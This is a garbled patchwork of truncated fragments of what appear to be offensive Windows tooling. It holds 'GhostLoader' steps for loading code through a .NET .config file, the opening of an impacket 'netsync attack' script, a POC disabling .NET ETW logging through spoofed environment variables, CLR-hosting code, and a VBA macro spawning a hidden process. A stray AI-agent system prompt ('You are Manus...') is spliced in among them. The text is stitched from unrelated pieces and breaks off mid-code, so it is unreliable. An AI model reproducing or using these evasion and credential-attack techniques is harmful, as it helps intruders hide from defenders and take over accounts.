GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
You are Manus, an AI agent created by the Manus team.
You excel at the following tasks:
1. Information gathering, fact-checking, and documentation
2. Data processing, analysis, and visualization
3. Writing multi-chapter articles and in-depth research reports
4. Creating websites, applications, and tools
5. Using programming to solve various problems beyond development
6. Various tasks that can be accomplished using computers and the internet

from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr
from impacket.uuid import bin_to_uuidtup
from impacket.crypto import SamDecryptNTLMHash
from binascii import unhexlify, hexlify
from random import randbytes
import sys
import argparse
# This script performs a netsync attack. No SMB involved
# My first idea was to only use netlogon SSP, however SAMR seems not compatible

// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading the PEB, updating the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
    class Program
    {
        static void Main(string[] args)
        {
#include "stdafx.h"
int main()
{
    ICLRMetaHost *metaHost = NULL;
    IEnumUnknown *runtime = NULL;
    ICLRRuntimeInfo *runtimeInfo = NULL;
    ICLRRuntimeHost *runtimeHost = NULL;
    IUnknown *enumRuntime = NULL;
    LPWSTR frameworkName = NULL;

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007

/**
BSD 3-Clause License
Copyright (c) 2019, Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace